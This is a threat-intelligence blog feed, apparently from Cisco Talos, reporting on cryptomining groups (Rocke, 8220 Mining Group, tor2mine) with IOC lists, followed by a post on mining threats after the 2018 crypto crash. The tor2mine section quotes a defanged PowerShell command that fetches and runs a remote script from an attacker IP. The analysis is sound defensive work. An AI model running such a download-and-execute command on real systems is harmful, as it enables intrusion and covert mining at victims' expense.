We also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits.

Rocke/Iron cybercrime group

Cisco Talos wrote about Rocke earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure.

In the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted Jenkins and JBoss servers, continuing to rely on malicious Git repositories, as well as malicious Amazon Machine Images. They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware capabilities. Several campaigns used the XHide Process Faker tool.

We have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn.

The dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.

While keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called whatMiner, developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as "collecting and integrating all different kinds of illicit mining malware."

Git repository for whatMiner

Looking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one.

While looking through this repository, we found a folder called "sustes." There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.

Many of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called "TermsHost.exe" from an IP 39[.]108[.]177[.]252, as well as a file called "xmr.txt" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called "TermsHost.exe" hosted on their C2 ssvs[.]space and a Monero mining config file called "xmr.txt" on the C2 sydwzl[.]cn.

When we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services.

Note that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke’s github since November, nor have we seen related samples in our honeypots since that time.

8220 Mining Group

As we previously described, Rocke originally forked a repository called "whatMiner." We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke.

We first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed:

We were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for.

These campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited Drupal content management system, Hadoop YARN, Redis, Weblogic and Couch DB. Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious Docker images. 8220 Mining Group was able to amass nearly $200,000 worth of Monero through their campaigns.

There were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file "logo*.jpg" (very similar to Rocke's use of malicious scripts under the file name of "logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.

tor2mine

Over the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden.

Recently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to.

It is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system:

C:\\Windows\\System32\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))

We identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC — a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk.

We began to research the malware and infrastructure used in this campaign. We observed previous research on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, "/win/checking-test.hta," that was almost identical to one we saw hosted on the tor2mine actors C2, "check.hta:"

/win/checking-test.hta from previous campaign

check.hta

This actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool.

Similarly, in February 2018, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw.

This malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign.

Conclusion

Through tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate.

The value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue.

There remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke’s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.

Talos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies.

Coverage

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Rocke

IPs:
121[.]126[.]223[.]211
142[.]44[.]215[.]177
144[.]217[.]61[.]147
118[.]24[.]150[.]172
185[.]133[.]193[.]163

Domains:
xmr.enjoytopic[.]tk
d.paloaltonetworks[.]tk
threatpost[.]tk
3g2upl4pq6kufc4m[.]tk
scan.3g2upl4pq6kufc4m[.]tk
e3sas6tzvehwgpak[.]tk
sample.sydwzl[.]cn
blockbitcoin[.]com
scan.blockbitcoin[.]tk
dazqc4f140wtl[.]cloudfront[.]net
d3goboxon32grk2l[.]tk
enjoytopic[.]tk
realtimenews[.]tk
8282[.]space
3389[.]space
svss[.]space
enjoytopic[.]esy[.]es
lienjoy[.]esy[.]es
d3oxpv9ajpsgxt[.]cloudfront[.]net
d3lvemwrafj7a7[.]cloudfront[.]net
d1ebv77j9rbkp6[.]enjoytopic[.]com
swb[.]one
d1uga3uzpppiit[.]cloudfront[.]net
emsisoft[.]enjoytopic[.]tk
ejectrift[.]censys[.]xyz
scan[.]censys[.]xyz
api[.]leakingprivacy[.]tk
news[.]realnewstime[.]xyz
scan[.]realnewstime[.]xyz
news[.]realtimenews[.]tk
scanaan[.]tk
www[.]qicheqiche[.]com

URLs:
hxxps://github[.]com/yj12ni
hxxps://github[.]com/rocke
hxxps://github[.]com/freebtcminer/
hxxps://github[.]com/tightsoft
hxxps://raw[.]githubusercontent[.]com/ghostevilxp
hxxp://www[.]qicheqiche[.]com
hxxp://123[.]206[.]13[.]220:8899
hxxps://gitee[.]com/c-888/
hxxp://gitlab[.]com/c-18
hxxp://www[.]ssvs[.]space/root[.]bin
hxxp://a[.]ssvs[.]space/db[.]sh
hxxp://a[.]ssvs[.]space/cf[.]cf
hxxp://a[.]ssvs[.]space/pluto
hxxp://ip[.]ssvs[.]space/xm64
hxxp://ip[.]ssvs[.]space/wt[.]conf
hxxp://ip[.]ssvs[.]space/mr[.]sh
hxxp://a[.]ssvs[.]space/logo[.]jpg
hxxp://a[.]sydwzl[.]cn/root[.]bin
hxxp://a[.]sydwzl[.]cn/x86[.]bin
hxxp://a[.]sydwzl[.]cn/bar[.]sh
hxxp://a[.]sydwzl[.]cn/crondb
hxxp://a[.]sydwzl[.]cn/pools[.]txt
hxxps://pastebin[.]com/raw/5bjpjvLP
hxxps://pastebin[.]com/raw/Fj2YdETv
hxxps://pastebin[.]com/raw/eRkrSQfE
hxxps://pastebin[.]com/raw/Gw7mywhC
hxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg
hxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg
hxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg
hxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg
hxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg
hxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg
hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408

SHA-256:
55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin
00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin
cdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh
959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf
d11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64
da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin
2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf
b1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh
7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin
904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg
f792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin
dcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin
3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh
a598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db
74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt

Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:
17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0
4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86

Wallets
rocke@live.cn
44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W
44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3
45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV
88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto

8220 Gang

45[.]32[.]39[.]40:8220
45[.]77[.]24[.]16
54[.]37[.]57[.]99:8220
67[.]21[.]81[.]179:8220
67[.]231[.]243[.]10:8220
98[.]142[.]140[.]13:8220
98[.]142[.]140[.]13:3333
98[.]142[.]140[.]13:8888
104[.]129[.]171[.]172:8220
104[.]225[.]147[.]196:8220
128[.]199[.]86[.]57:8220
142[.]4[.]124[.]50:8220
142[.]4[.]124[.]164:8220
158[.]69[.]133[.]17:8220
158[.]69[.]133[.]18:8220
158[.]69[.]133[.]20:3333
162[.]212[.]157[.]244:8220
165[.]227[.]215[.]212:8220
185[.]82[.]218[.]206:8220
192[.]99[.]142[.]226:8220
192[.]99[.]142[.]227
192[.]99[.]142[.]232:8220
192[.]99[.]142[.]235:8220
192[.]99[.]142[.]240:8220
192[.]99[.]142[.]248:8220
192[.]99[.]142[.]249:3333
192[.]99[.]142[.]251:80
192[.]99[.]56[.]117:8220
195[.]123[.]224[.]186:8220
198[.]181[.]41[.]97:8220
202[.]144[.]193[.]110:3333
hxxps://github[.]com/MRdoulestar/whatMiner

1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13
e2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e
31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1
cb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35
cfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e
efbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803
384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52

Samples associated with whatMiner:
f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c
1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04
241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04

Wallets
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S

Tor2mine

107[.]181[.]160[.]197
107[.]181[.]174[.]248
107[.]181[.]187[.]132
asq[.]r77vh0[.]pw
194[.]67[.]204[.]189
qm7gmtaagejolddt[.]onion[.]to
res1[.]myrms[.]pw
hxxps://gitlab[.]com/Shtrawban
rig[.]zxcvb[.]pw
back123[.]brasilia[.]me

91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe
44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe
3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe
c3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe
4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1
904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat
4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta
af780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta
cc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1
ee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta
a7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat
0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php
e0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat
b2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1
18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe
112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1
e1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta
61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1
f1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat
cce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe

Uncategorized groups

188[.]166[.]38[.]137
91[.]121[.]87[.]10
94[.]23[.]206[.]130

46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava
44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg

↧

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

December 18, 2018, 8:33 am

≫ Next: Microsoft Patches Out-of-Band Internet Explorer Scripting Engine Vulnerability After Exploitation Detected in the Wild

≪ Previous: Connecting the dots between recently active cryptominers

Post authored by Nick Biasini.

Executive Summary

As 2018 draws to a close, one technology has definitively left its mark on the year: cryptocurrencies. Digital currencies started the year out strong after a meteoric rise toward the end of 2017. Since then, it's safe to say that cryptocurrencies have had a massive impact globally, especially on the threat landscape. However, 2018 is ending on a sour note for these currencies, as they have been in steady decline, ending in a sudden drop resulting in losses in excess of 75 percent of their value from the highs of late 2017 and early 2018.

Malicious cryptocurrency mining was the new payload of choice for adversaries and recurring revenue, dislodging the lump-sum payouts of threats like ransomware atop the threat landscape.

But the sudden collapse of the market, after a gradual decline, raises the question about how the threat landscape would be impacted, if at all. Despite conventional wisdom, Cisco Talos hasn't seen a notable shift away from cryptocurrency mining. We have seen pockets of movement, but they have lived explicitly in the email space where both threat distribution and botnets play a crucial role. As 2018 proceeded, adversaries have shifted payloads in the email space away from cryptocurrency mining and toward more modular threats like Emotet and remote access trojans (RATs). Talos is also releasing another blog today outlining some of the campaigns we've seen recently from some well-known actors who have a history with cryptocurrency mining.

After reviewing the real-world impact and associated data, it appears that cryptocurrency mining is not slowing down, and if anything, could be slightly increasing in frequency for certain aspects of the landscape. As we move into 2019, it's likely that the payloads of choice will continue to diverge between different aspects of the threat landscape. Regardless, enterprises need to be prepared to deal with malicious or unauthorized cryptocurrency mining activities on their respective networks, because it's not going away — at least not yet.

Introduction

It's clear, as far as the threat landscape is concerned, 2018 was the year of malicious cryptocurrency mining. Cisco Talos first covered cryptocurrency mining in early 2018, and again at multiple points throughout the year, including a whitepaper discussing the threat and associated coverage. In these attacks, malicious actors inject malware into systems and steal their computing power to "mine" cryptocurrencies. If done on a large scale, this kind of attack could cost enterprises a great deal of energy and resources. And for a personal user, it could significantly slow down their computing power and speed.

At the time, it was clear that actors had started to push quickly into primarily Monero-based cryptocurrency mining as a payload of choice. Since then, we have witnessed one of the most significant shifts in the threat landscape in years — and perhaps ever. Adversaries have gone all in on the idea of the recurring revenue model of cryptocurrency mining instead of the lump-sum gamble that ransomware provided so effectively throughout 2016 and 2017. In ransomware attacks, attackers asked for infected users to pay them a sum of money in exchange for the return of their information. But with miners, the attackers see revenue on a daily basis from their activities.

This mass migration does have its risks, however. Primary among them is the value of the currency being mined. When we first wrote about malicious cryptocurrency mining, an adversary could hope to make about $0.25 per day for a basic home computer. As of the writing of this blog, that value has cratered to a little more than $0.04 per day for that same computer. As you can imagine, this has had an impact on adversaries' bottom lines. It now takes almost six systems to create the same revenue that one generated previously. Before we get too deep into the potential impact, let's discuss the size and scope of the role that cryptocurrency mining had on the threat landscape in 2018. One of the most interesting aspects is how widely this shift was adopted across multiple different attack avenues including spam, web and active exploitation.

Spam and the mining effect

One of the best indicators for how a threat is affecting the threat landscape is spam levels. Much of the spam we see on a daily basis is being generated from botnets, and those botnets are undertaking that activity to generate revenue. This is where we have seen some shifts throughout the year of cryptocurrency mining. As you can see, below the amount of overall spam, excluding two extremely high volume campaigns early in 2018, is down.

Late in 2017 and continuing into early in 2018, spam levels were dropping.Since then, they have begun to rise, and are now approaching the levels seen through most of 2017. This is indicative of botnet functionality shifts where some of the systems that had previously been used to send spam may have been altered to instead work on cryptocurrency mining. There have been reports throughout the past year of botnets such as Necurs experimenting with cryptocurrency mining instead of spam generation. However, there are two sides to the spam landscape, and they tell two different stories. One side are those that control the botnets that send spam, the other uses spam as a mechanism to spread their malware.

Adversaries that deliver their malware via spam are a different demographic, and as such, the landscape appears slightly different. Early on in 2018,Talos saw near constant campaigns delivering malicious cryptocurrency miners directly or using a downloader. As the year progressed, and more recently as the price of cryptocurrencies began to waiver, we are seeing adversaries push into different areas, delivering different payloads.

Emotet became one of the big winners as cryptocurrency miners waned. We have seen Emotet continue to be delivered in large numbers when active. Emotet continues to be a highly effective, modular payload that contains several functions, now including ransomware. These types of modular malware frameworks that allow adversaries to deliver varied payloads are going to continue to rise in popularity, as the final payload can depend on a lot of external factors. Today, when looking at the spam landscape, you do periodically see campaigns delivering miners, but they are far less common than they were earlier in 2018.Now, you are more likely to find a RAT or modular threat like Emotet than a miner. Cryptocurrency mining has had a marked impact on the email threat landscape in 2018, but email is just one of the key indicators on the threat landscape. Next, we'll take a look at web-based attacks.

Web

Web-based attacks continue to be heavily leveraged by attackers to compromise systems around the world. In previous years, exploit kits and malvertising campaigns were used to distribute ransomware and other threats to compromised systems. Since late 2016, there has been a marked decline in global exploit kit activity. Of the campaigns that remained, malicious cryptomining payloads were being distributed commonly via downloaders, rather than some of the other malware that had been historically associated with these campaigns. Along with exploit kits and malvertising, cryptocurrency mining malware was also frequently seen being delivered through fake Flash Player updates. In these attacks, victims are prompted to update their version of Adobe Flash Player, but the malware downloads a payload used to infect systems and mine cryptocurrency for cybercriminals.

Likewise, "in-browser" mining such as CoinHive became popular with many websites using scripts embedded on web pages that cause visitors of the websites to mine cryptocurrency in their web browsers. Cryptocurrency mining became so mainstream in 2018 that some shareware applications were even prompting users to allow them to leverage their systems to mine cryptocurrency as a way to support the application's developers. Regardless of the methodology, there is too much of an opportunity for adversaries to pass up. Malicious cryptocurrency mining can involve almost no additional communications, and in the case of in-browser or shareware-supported mining, it's as simple as "some money is better than no money." As long as there is money to be made, malicious or unauthorized cryptocurrency mining will be part of daily life on the internet. We've covered web and email, now let's now turn our focus to more active measures that adversaries take with direct, active exploitation.

Active exploitation

One unique aspect of malicious cryptocurrency mining is that the amount of revenue a compromised system can generate is directly related to the hardware that the system is running. Cisco Talos observed, for at least a year, as adversaries discussed the potential for malicious cryptocurrency mining and then implement those capabilities. Talos has seen countless examples of how active exploitation can play a significant role in malicious cryptocurrency mining.

From Apache Struts to Eternal Blue, Oracle WebLogic, and other widespread remotely exploitable bugs, adversaries have been actively exploiting systems to deliver hordes of miners. In some cases, adversaries added worming functionality — meaning it can self-replicate and affect other machines — to infect large swaths of machines as fast as possible. Regardless of the methodology, servers are a vital target for malicious cryptocurrency mining because of the increased revenue potential. This has mainly remained steady despite the volatility of the value in the currency itself. The fact remains that cryptocurrency mining generates revenue, and once an actor or group of actors has taken the time and cost to retool for a new threat, it's going to take a lot to move them off of that particular payload. If there were to be a significant global shift in cryptocurrency mining, this would be the place that it would likely be most noticeable. Each area of the threat landscape has been impacted in some way by cryptocurrency mining, but the real-life impacts are where enterprises are most concerned.

For more detail on the progression of these campaigns over the past year, with a specific focus on these active exploitation campaigns, see our accompanying blog here.

Real-life impact

One of the best indicators of where we are with a threat is the real-life impact. For this blog, there are two primary areas where that data will be: from the endpoint and the network. Without question, cryptocurrency mining has been the dominant threat on the threat landscape for much, if not all, of 2018. The most common alert we received in 2018 was related to cryptocurrency mining, its delivery, or its propagation by a significant margin. What's even more interesting is it doesn't appear to be fading, at least not yet.

When we began looking at the data, the expectation was that the overall amount of cryptocurrency mining activity would be decreasing in recent months, but that wasn't the case. There has been a small decrease in the amount of cryptocurrency mining activity, but those have been pigeonholed into a couple of areas of the threat landscape. The most substantial decrease has been in the number of malicious spam emails. Earlier on in 2018, we would see campaigns running around the clock delivering cryptocurrency miners. By the end of 2018, that was not the case.Instead, it's threats like RATs and Emotet that are dominating that particular landscape.

As you can see, there has been some variance in the number of events from week to week over the past six months, but generally, the trend line has held, and the overall volume of alerts has not changed significantly since June 2018.

Let's start by looking at network-based detections.In this particular circumstance, we are looking specifically at cryptocurrency mining activity on the wire, and not the delivery or propagation of the miners. This is a clean look specifically at actual mining activity instead of the distribution. Notice that if you look at the trend line, levels have increased slightly dating back to June. So despite the fact that we do not see miners being pushed at the same level, specifically in the email space, the overall capabilities remain primarily static. This implies both long-term mining activity and the importance of active exploitation, brute forcing and web-based attacks to the threat landscape, specifically around malicious mining.

The endpoint data held steady for the most part but it does vary more widely from one day to the next. That could be the result of systems being shut down or cleaned at irregular intervals. Regardless, you do not see any significant downward movement, including the last month when the price of cryptocurrencies truly cratered.

Cryptocurrency price crash

The real driving factor behind this potential large-scale shift is the value of cryptocurrency across the board. It reached levels in late 2017 that were not thought possible a mere six months earlier. As that rise continued, extreme interest in cryptocurrencies rose along with it. Quickly, people that had invested thousands of dollars a few years prior were now knocking on the door of being millionaires. This also coincided with the rise of ransomware, since cryptocurrencies are the primary method of payment.

The benefits weren't restricted to those that adopted the new currency early on. Adversaries and businesses alike found themselves sitting on sizable chunks of digital currency. Bad actors that were accepting bitcoin early on saw its value increase by tenfold, if not more, but there were always murmurs and skepticism around the meteoric rise in value.

Over the past six months, the value of cryptocurrencies had begun to fade, and over the last month-plus, the values have plummeted. At this point, most of the currencies have lost at least 75 percent of their peak values and late investors and adversaries may be paying the price.

Late in 2017, Bitcoin set an all-time high of nearly $20,000, and since then, it's been a steady decline to a value of less than $4,000, a decline of more than 75 percent from its peak in December 2017.

Monero has followed a similar path, albeit on a smaller scale. Early in 2018, Monero prices hit an all-time high of just above $470 per coin and a steady decline has followed throughout 2018. The value has now cratered to below $55 a coin — an astonishing loss of 86 percent of its value in less than a year as of the time of writing.

Although it's been a steady decline throughout the past year, the last month has been particularly brutal. Both Bitcoin and Monero have been hemorrhaging value in the past 30 days, and the effects are stark. Bitcoin has lost an improbable 40 percent of its value in the last month, only to be topped by Monero, which lost a staggering 50 percent of its value in the past 30 days.

Despite its recent collapse, it's evident that cryptocurrency is here to stay and will remain a player on the threat landscape for quite some time. For adversaries using cryptocurrency for payments such as ransomware, it doesn't have much of an effect, they increase the amount of coin they request to account for the decreased value.

Future of mining

Now that all the data has been discussed the real question remains: What does this mean for the future of mining?

The honest answer is we don't know, but there is plenty of room to speculate. The first thing to realize is cryptocurrency mining is a large portion of the threat landscape, and it will continue to be, but the question is where. The tooling and methodology required to make the shift for a threat group doing things like active exploitation and brute forcing are going to be exceedingly different from those looking to compromise average users using threats like cryptocurrency mining, RATs and banking trojans, among others. As such, the outlook for their respective landscapes differs significantly.

